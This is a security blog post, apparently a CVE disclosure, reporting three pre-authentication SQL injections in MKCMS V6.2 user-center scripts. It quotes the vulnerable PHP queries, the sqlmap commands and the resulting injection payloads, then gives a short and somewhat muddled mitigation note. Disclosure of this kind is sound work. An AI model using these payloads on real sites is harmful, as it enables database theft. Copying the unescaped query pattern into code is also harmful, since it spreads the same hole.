<p><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586576676672-8bef147b-e4c1-4e41-951b-38e9cc20e422.png#align=left&display=inline&height=438&margin=%5Bobject%20Object%5D&name=image.png&originHeight=876&originWidth=1189&size=159520&status=done&style=none&width=594.5" alt="image.png"></p>
<h1 id="0x01-PreAuth-SQL-injection-in-ucenter-repass-php"><a href="#0x01-PreAuth-SQL-injection-in-ucenter-repass-php" class="headerlink" title="0x01:PreAuth SQL injection in /ucenter/repass.php"></a>0x01:PreAuth SQL injection in /ucenter/repass.php</h1><p>MKCMS V6.2 has SQL injection via the /ucenter/repass.php <em>name</em> parameter.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/ucenter/repass.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">$username = stripslashes(trim($_POST[<span class="string">'name'</span>]));</span><br><span class="line">$email = trim($_POST[<span class="string">'email'</span>]);</span><br><span class="line"><span class="comment">// 检测用户名是否存在</span></span><br><span class="line">$query = mysql_query(<span class="string">"select u_id from mkcms_user where u_name='$username' and u_email='$email'"</span>);</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>

<p>and it can be automated exploited by sqlmap namely</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:<span class="comment">//localhost/ucenter/repass.php  --data "name=1&amp;email=1@1.com" -p name</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Parameter: name (POST)</span><br><span class="line">    Type: time-based blind</span><br><span class="line">    Title: MySQL &gt;= <span class="number">5.0</span><span class="number">.12</span> <span class="keyword">AND</span> time-based blind (query SLEEP)</span><br><span class="line">    Payload: name=<span class="number">11</span><span class="string">' AND (SELECT 7672 FROM (SELECT(SLEEP(5)))NmRk) AND '</span>VTKx<span class="string">'='</span>VTKx&amp;email=<span class="number">222</span>@<span class="number">222.</span>m&amp;submit=</span><br></pre></td></tr></table></figure>

<p>And this can be tracked in 2019 via <a href="https://xz.aliyun.com/t/4189#toc-1" target="_blank" rel="noopener">https://xz.aliyun.com/t/4189#toc-1  </a>by <a href="https://xz.aliyun.com/u/12470" target="_blank" rel="noopener">CoolCat</a>, so CVE request of this vuln won’t belong to me, I just wanna enrich the CVE database.</p>
<h1 id="0x02-PreAuth-SQL-injection-in-ucenter-active-php"><a href="#0x02-PreAuth-SQL-injection-in-ucenter-active-php" class="headerlink" title="0x02:PreAuth SQL injection in /ucenter/active.php"></a>0x02:PreAuth SQL injection in /ucenter/active.php</h1><p>MKCMS V6.2 has SQL injection via the /ucenter/active.php <em>verify</em> parameter.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/ucenter/active.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line">$verify = stripslashes(trim($_GET[<span class="string">'verify'</span>]));	<span class="comment">//去掉了转义用的\</span></span><br><span class="line">$nowtime = time();</span><br><span class="line">$query = mysql_query(<span class="string">"select u_id from mkcms_user where u_question='$verify'"</span>);</span><br><span class="line">$row = mysql_fetch_array($query);</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>Likewise, attackers can exploit it via sqlmap by typing</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http://localhost/ucenter/active.php?verify=1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Parameter: verify (GET)</span><br><span class="line">    Type: time-based blind</span><br><span class="line">    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</span><br><span class="line">    Payload: verify=1' AND (SELECT 5656 FROM (SELECT(SLEEP(5)))xcPF) AND 'TRJq'='TRJq</span><br><span class="line"></span><br><span class="line">    Type: UNION query</span><br><span class="line">    Title: Generic UNION query (NULL) - 1 column</span><br><span class="line">    Payload: verify=1' UNION ALL SELECT CONCAT(0x7171786b71,0x706d4e457048744251624653456d554a685a77654c66497a736d704c7454586462716f457a56587a,0x71707a7671)-- WUGv</span><br></pre></td></tr></table></figure>

<h1 id="0x03-PreAuth-SQL-injection-in-ucenter-reg-php"><a href="#0x03-PreAuth-SQL-injection-in-ucenter-reg-php" class="headerlink" title="0x03:PreAuth SQL injection in /ucenter/reg.php"></a>0x03:PreAuth SQL injection in /ucenter/reg.php</h1><p>MKCMS V6.2 has SQL injection via the /ucenter/reg.php <em>name</em> parameter.h</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/ucenter/reg.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">$username = stripslashes(trim($_POST[<span class="string">'name'</span>]));</span><br><span class="line"><span class="comment">// 检测用户名是否存在</span></span><br><span class="line">$query = mysql_query(<span class="string">"select u_id from mkcms_user where u_name='$username'"</span>);</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>

<p>Again, sqlmap can be used to automate the exploitation</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u http:<span class="comment">//localhost/ucenter/reg.php  --data "name=1&amp;submit=1@1.com" -p name</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Parameter: name (POST)</span><br><span class="line">    Type: boolean-based blind</span><br><span class="line">    Title: <span class="keyword">AND</span> boolean-based blind - WHERE <span class="keyword">or</span> HAVING clause</span><br><span class="line">    Payload: name=<span class="number">1</span><span class="string">' AND 2487=2487 AND '</span>WOhs<span class="string">'='</span>WOhs&amp;submit=<span class="number">1</span>@<span class="number">1.</span>com</span><br><span class="line"></span><br><span class="line">    Type: time-based blind</span><br><span class="line">    Title: MySQL &gt;= <span class="number">5.0</span><span class="number">.12</span> <span class="keyword">AND</span> time-based blind (query SLEEP)</span><br><span class="line">    Payload: name=<span class="number">1</span><span class="string">' AND (SELECT 6840 FROM (SELECT(SLEEP(5)))rygh) AND '</span>eoEE<span class="string">'='</span>eoEE&amp;submit=<span class="number">1</span>@<span class="number">1.</span>com</span><br></pre></td></tr></table></figure>

<h1 id="0x04-Mitigation"><a href="#0x04-Mitigation" class="headerlink" title="0x04:Mitigation"></a>0x04:Mitigation</h1><p>remove the <code>stripslashes()</code> before the POST/GET param, thus we can’t exploit it unless the coding of MYSQL is GBK/GB2312, i.e.<em>wide byte sql injection.</em><br>(In my opinion,  is there any need to escape the name? it has never been allowed at all !</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/04/05/yuque/SQLi-lab%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="next" title="SQLi-lab学习笔记">
                <i class="fa fa-chevron-left"></i> SQLi-lab学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/15/yuque/HackTheBox%EF%BC%9ABastard%20%E7%AC%94%E8%AE%B0/" rel="prev" title="HackTheBox：Bastard 笔记">
                HackTheBox：Bastard 笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Unc1e</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-全局过滤分析"><span class="nav-number">1.</span> <span class="nav-text">0x00 全局过滤分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-验证码重用"><span class="nav-number">2.</span> <span class="nav-text">0x01 验证码重用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-前台注入-1：-ucenter-repass-php"><span class="nav-number">3.</span> <span class="nav-text">0x02 前台注入 1：&#x2F;ucenter&#x2F;repass.php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-前台注入-2：-ucenter-active-php"><span class="nav-number">4.</span> <span class="nav-text">0x03 前台注入 2：&#x2F;ucenter&#x2F;active.php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-前台注入-3：-ucenter-reg-php"><span class="nav-number">5.</span> <span class="nav-text">0x04 前台注入 3：&#x2F;ucenter&#x2F;reg.php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-任意用户密码找回（密码可被穷举）"><span class="nav-number">6.</span> <span class="nav-text">0x05 任意用户密码找回（密码可被穷举）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x06-备份文件路径可猜解"><span class="nav-number">7.</span> <span class="nav-text">0x06 备份文件路径可猜解</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x07-前台文件上传"><span class="nav-number">8.</span> <span class="nav-text">0x07 前台文件上传</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x08-凭据硬编码"><span class="nav-number">9.</span> <span class="nav-text">0x08 凭据硬编码</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x09-越权"><span class="nav-number">10.</span> <span class="nav-text">0x09 越权</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CVE-Request-English-Version"><span class="nav-number">11.</span> <span class="nav-text">CVE Request : English Version</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-Lead-In"><span class="nav-number">12.</span> <span class="nav-text">0x00:Lead In</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-PreAuth-SQL-injection-in-ucenter-repass-php"><span class="nav-number">13.</span> <span class="nav-text">0x01:PreAuth SQL injection in &#x2F;ucenter&#x2F;repass.php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-PreAuth-SQL-injection-in-ucenter-active-php"><span class="nav-number">14.</span> <span class="nav-text">0x02:PreAuth SQL injection in &#x2F;ucenter&#x2F;active.php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-PreAuth-SQL-injection-in-ucenter-reg-php"><span class="nav-number">15.</span> <span class="nav-text">0x03:PreAuth SQL injection in &#x2F;ucenter&#x2F;reg.php</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-Mitigation"><span class="nav-number">16.</span> <span class="nav-text">0x04:Mitigation</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Unc1e</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
